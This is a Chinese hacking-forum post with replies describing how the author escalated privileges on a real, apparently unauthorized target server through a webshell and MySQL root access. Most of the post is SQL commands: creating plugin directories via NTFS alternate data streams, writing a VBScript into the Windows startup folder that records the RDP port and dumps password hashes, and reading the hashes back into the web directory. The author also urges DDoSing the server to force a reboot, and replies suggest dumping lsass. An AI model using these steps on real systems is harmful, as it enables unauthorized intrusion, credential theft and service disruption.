查看: 31292|回复: 92

[红盟杯]鸡肋提权之变态root利用

[复制链接]
  • TA的每日心情
    开心
    2016-12-5 14:40
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2015-4-12 15:21:11 | 显示全部楼层 |阅读模式
    ##########################################
    #  Title    :鸡肋提权之变态root利用
    #  Time   :2015年4月12日
    #  Team  :ihonker Team
    #  Author : Binghe
    #  首发   : 本人原创技术博客文章投稿至  ihonker.org
    #######################################


    我来投稿,给红盟加加油

    唉,这星期电脑被扣了,木法学习了,没法干活了。。。。特么刚到学校没几天,火龙童鞋就找我了,火急火燎。。。




    你急有毛用,我电脑没带,怎么搞? 联系了基友adminlm牛看看吧,他说有防护软件啥的,有root,无法UDF,于是我让他去Mof,经历一番周折,知道了,对mof目录也锁定了权限,无法用root导出mof文件到目录。。。卧槽,




    由于我无法电脑操作,我又给他提供了一些思路,php无法调用ws组建,试试asp,后来听火龙瘠薄说整个服务器全都是phpweb的站点,。。提权陷入僵局。
    后来喝了一杯82年的乐事冷静了一下,最后一招,写启动。。

    于是让adminlm测试,他不知道再搞些什么东西,也听不懂我的思路,








    。。。。我还是自己来吧。。。。

    找个语文课的时间,啪。。,飞出来了。。。高二狗。。。



    直接上传了一个udf.php,看了下情况
    版本大于mysql5.0 dll要导出到mysql.exe目录\lib\plugin ,默认不存在\lib\plugin目录,需要用NTFS ads 引流来创建

    [AppleScript] 纯文本查看 复制代码
    select @@basedir;
    //查找到mysql的目录 这里回显:D:\Huweishen.com\PHPWEB\MySQL Server 5.5
    select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib::$INDEX_ALLOCATION';
    //利用NTFS ADS创建lib目录 注意路径的替换。还有\换成\\
    select 'It is dll' into dumpfile 'D:\\Huweishen.com\\PHPWEB\\MySQL Server 5.5\\lib\\plugin::$INDEX_ALLOCATION';
    //利用NTFS ADS创建plugin目录







    这样啊  adminlm来的时候已经创建了  已经存在目录



    [AppleScript] 纯文本查看 复制代码
    File 'D:\Huweishen.com\PHPWEB\MySQL Server 5.5\lib\plugin::$INDEX_ALLOCATION' already exists






    导出试试看  估计不行  要不然adminlm、早拿下了





    mof我也不测试哦了,估计也是不行  因为这个鸟东西在,护卫神!!





    写启动项添加用户我也不测试了  万一上面有什么防护软件直接就阻止了

    思路还有的,三行代码导hash,破解。ok
    然后有人不服,你破解出来又如何,端口你知道????
    哦,我不知道,但是我还是可以查。。。看操作吧

    建表:



    [AppleScript] 纯文本查看 复制代码
    create table binghe (cmd text);


    好了,我们创建了一个新的表,表名为binghe,表中只存放一个字段,字段名为cmd,为text文本。
    在表中插入内容

    [AppleScript] 纯文本查看 复制代码
    insert into binghe values ("set wshshell=createobject (""wscript.shell"" ) " );






    插入三行代码导出hash,三行代码不予公布,免得众人装逼



    [AppleScript] 纯文本查看 复制代码
    insert into binghe values ("b=wshshell.run (""c0de1 & c0de2 & code3"",0) " );





    三行代码运行之后会在启动目录生成三个文件,到时候loadfile读取,然后本地破解就可以获得管理密码
    那么如何获得端口号??
    呵呵,这样来
    先找到终端服务对应的pid 并将结果写入(>)shell目录的binghe.txt


    [AppleScript] 纯文本查看 复制代码
        insert into binghe values ("b=wshshell.run (""tasklist /svc | find "termservice">D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
        注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录



    再来,查询端口服务,并将结果追加写入(>>)shell目录的binghe.txt


    [AppleScript] 纯文本查看 复制代码
        insert into binghe values ("b=wshshell.run (""netstat -ano>>D:/wwwroot/adpcd.com/include/binghe.txt"",0) " );
        注:这里的D:/wwwroot/adpcd.com/include/ 属于webshell目录 



    看看我在shell上面的实际操作




    这里打了性感的马赛克









    来查一下是不是写进去了??

    [AppleScript] 纯文本查看 复制代码
    select * from binghe;




    好了,一切完毕  开始导出到启动项


    [AppleScript] 纯文本查看 复制代码
        select * from binghe into outfile "c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\binghe.vbs"; 


    再来loadfile看看 应该写进去了


    接下来的事就不是我的事情了
    @火龙,交给你,你不是说你的朋友有多少多少G纯流量吗,狠狠地ddos,打到管理员他喊叔叔也不停,然后他就去重启服务器了,然后。。你懂得!

    还是说下吧,重启之后,按照我的预想,会在D:/wwwroot/adpcd.com/include/这个目录下生成一个Binghe.txt(内容包括termservice进程服务的pid和端口细节及对应pid,会提权的人都知道这两个pid对比就会获得终端端口号)  ,另外在启动目录会生成三个hash的文件,到时候你来找我,我去loadfile他的hash,命令如下

    [AppleScript] 纯文本查看 复制代码
        select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file1') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe1.txt'
         
        select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file2') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe2.txt'
         
        select load_file('c:\\docume~1\\alluse~1\\「开始」菜单\\程序\\启动\\file3') into dumpfile 'D:/wwwroot/adpcd.com/include/binghe3.txt'
         
        注:file1\file2\file3 分别为三个hash文件


    额,这是最后的思路了,比较鸡肋。。。没有办法的办法
    静待重启吧,时间问题。

    另外谢谢adminlm大牛帮我测试,好机油,下次去找你玩哈
    另外说一句,谁对我好我对谁好,火龙大哥帮过我不少,人要有感激之心,他有问题我当倾力解决。。。不说了,我该回去了  卧槽  还要翻墙进去。。别举报我!




    评分

    参与人数 5i币 +62 贡献 +2 收起 理由
    color + 6 666666高二党
    chong + 6 666高二党
    C4r1st + 24 感谢分享,排版漂亮。
    惊颠 + 6
    管理01 + 20 + 2 支持原创

    查看全部评分

    回复

    使用道具 举报

    该用户从未签到

    发表于 2015-4-12 15:48:24 | 显示全部楼层
    支持原创,思路不错。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2020-2-28 20:27
  • 签到天数: 228 天

    [LV.7]常住居民III

    发表于 2015-4-12 18:52:07 | 显示全部楼层
    竟然是护卫神的mysql 我有n多个这种webshell 提权不了 回复完看看先
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2016-8-26 14:36
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    发表于 2015-4-12 20:21:54 | 显示全部楼层
    这思路有点厉害哦,不知道最后成功没有,最重要的是楼主你才高二就那么牛逼真的好么
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-8-19 10:32
  • 签到天数: 80 天

    [LV.6]常住居民II

    发表于 2015-4-12 21:04:02 | 显示全部楼层
    为什么刚开始说导入启动项不行,后来还是导入到了启动项里面

    点评

    开始想的写远控木马进去 后来想想各种杀软还是放弃了 那三行代码过任何杀软 所以后来还是写进去  详情 回复 发表于 2015-4-12 23:56
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-6-22 13:45
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2015-4-12 21:05:33 | 显示全部楼层
    插入三行代码导出hash,三行代码不予公布,免得众人装逼  醉了,几年前的东西

    点评

    大牛见笑了 小弟是高中生还在学习中  详情 回复 发表于 2015-4-12 23:59
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-12-25 11:55
  • 签到天数: 103 天

    [LV.6]常住居民II

    发表于 2015-4-12 21:44:39 | 显示全部楼层
    能写文件到启动那里的话,直接用procdump把lsass.exe dump出来到网站某个目录,等管理员重启的时候不就可以下载下来看明文了吗?hash破解很费时额。(纯个人见解)

    点评

    这是不可以的,护卫神会拦截抓工具抓hash 或明文  详情 回复 发表于 2015-4-12 23:57
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-12-5 14:40
  • 签到天数: 4 天

    [LV.2]偶尔看看I

     楼主| 发表于 2015-4-12 23:56:03 | 显示全部楼层
    王珂 发表于 2015-4-12 21:04
    为什么刚开始说导入启动项不行,后来还是导入到了启动项里面

    开始想的写远控木马进去  后来想想各种杀软还是放弃了  那三行代码过任何杀软  所以后来还是写进去
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-12-5 14:40
  • 签到天数: 4 天

    [LV.2]偶尔看看I

     楼主| 发表于 2015-4-12 23:57:53 | 显示全部楼层
    tintion 发表于 2015-4-12 21:44
    能写文件到启动那里的话,直接用procdump把lsass.exe dump出来到网站某个目录,等管理员重启的时候不就可以 ...

    这是不可以的,护卫神会拦截抓工具抓hash 或明文

    点评

    那你直接放一个添加账户的脚本不就行了吗?  详情 回复 发表于 2015-4-14 20:50
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-12-5 14:40
  • 签到天数: 4 天

    [LV.2]偶尔看看I

     楼主| 发表于 2015-4-12 23:59:37 | 显示全部楼层
    a13775647904 发表于 2015-4-12 21:05
    插入三行代码导出hash,三行代码不予公布,免得众人装逼  醉了,几年前的东西 ...

    大牛见笑了  小弟是高中生还在学习中
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 21:08 , Processed in 0.026302 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部